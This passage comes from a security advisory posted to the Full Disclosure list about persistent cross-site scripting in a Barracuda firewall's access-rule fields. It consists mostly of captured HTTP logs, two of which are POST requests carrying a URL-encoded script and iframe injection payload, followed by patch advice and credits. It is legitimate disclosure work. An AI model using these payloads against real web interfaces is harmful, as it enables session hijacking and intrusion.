User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/ext-ux.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.096[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/css/bfw.css?v=6.1.0.016 Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.189[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.190[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] \
Content Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850]
2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:22.387[0ms][total 0ms] Status: pending[]
GET https://firewall.ptest.cudasvc.com/favicon.ico Load Flags[LOAD_NORMAL] Content \
Size[unknown] Mime Type[unknown] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
2:35:38.671[841ms][total 841ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load Flags[LOAD_BYPASS_CACHE \
LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/plain] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850] \
Content-Length[339] Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_src_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Ciframe%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fiframe%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Tue, 01 Oct 2013 00:35:40 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
2:35:50.213[300ms][total 300ms] Status: 200[OK]
POST https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi Load Flags[LOAD_BYPASS_CACHE \
LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/plain] Request Headers:
Host[firewall.ptest.cudasvc.com]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/javascript, text/html, application/xml, text/xml, */*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-Prototype-Version[1.7]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
Referer[https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=38094a91aaca441b13c6 \
1e5740b49695&et=1380588910&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_typ \
e=Local&update_type=add&locale=en_US&secondary_tab=add_access_rule&content_only=1&user=guest&bac \
kup_life=0&ispopup=1&parent_name=firewall_access_rules&popup_width=700&popup_height=850] \
Content-Length[339] Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
Post Data:
ajax_action[check_param_ajax_single]
name[UPDATE_fw_access_rule_dst_inc_single]
value['%22%3E%3E%22%3Cscript%3Eprompt(1337)%3C%2Fscript%3E%20%3E%22%3Ciframe%20onload%3Dprompt(7331)%20src%3Dhttp%3A%2F%2Fvuln-lab.com%20%3C%2Fiframe%3E%20%3C]
user[guest]
password[11b4e698d80c20f443854d6eb442c17c]
et[1380588921]
locale[en_US]
auth_type[Local]
realm[]
Response Headers:
Server[BarracudaFirewallHTTP 4.0]
Date[Tue, 01 Oct 2013 00:35:51 GMT]
Content-Type[text/plain; charset=utf-8]
Transfer-Encoding[chunked]
Connection[keep-alive]
Reference(s): URLs
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?password=6822f33a0a0c182212b81d743623a562&et=1380586668
&primary_tab=FIREWALL&new_secondary_tab=firewall_access_rules&auth_type=Local&update_type=add&locale=en_US&
secondary_tab=add_access_rule&content_only=1&user=guest&backup_life=0&ispopup=1&parent_name=firewall_access_rules&
popup_width=700&popup_height=850
https://firewall.ptest.cudasvc.com/cgi-mod/index.cgi?locale=en_US
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a more secure filter and restriction of the `redirect to` & \
`ip address` input field of destination and source. Also parse the saved selected listing in \
the new visible listing menu under the input fields.
Barracuda Networks: Appliances > Advanced > Firmware Updates (automatic) page or use the \
regular customer panel https://www.barracuda.com/support/knowledgebase/501600000013gvr
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities and filter bypass are \
estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com] Vulnerability Laboratory [Research Team] - Ebrahim Hegazy \
(ebrahim@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic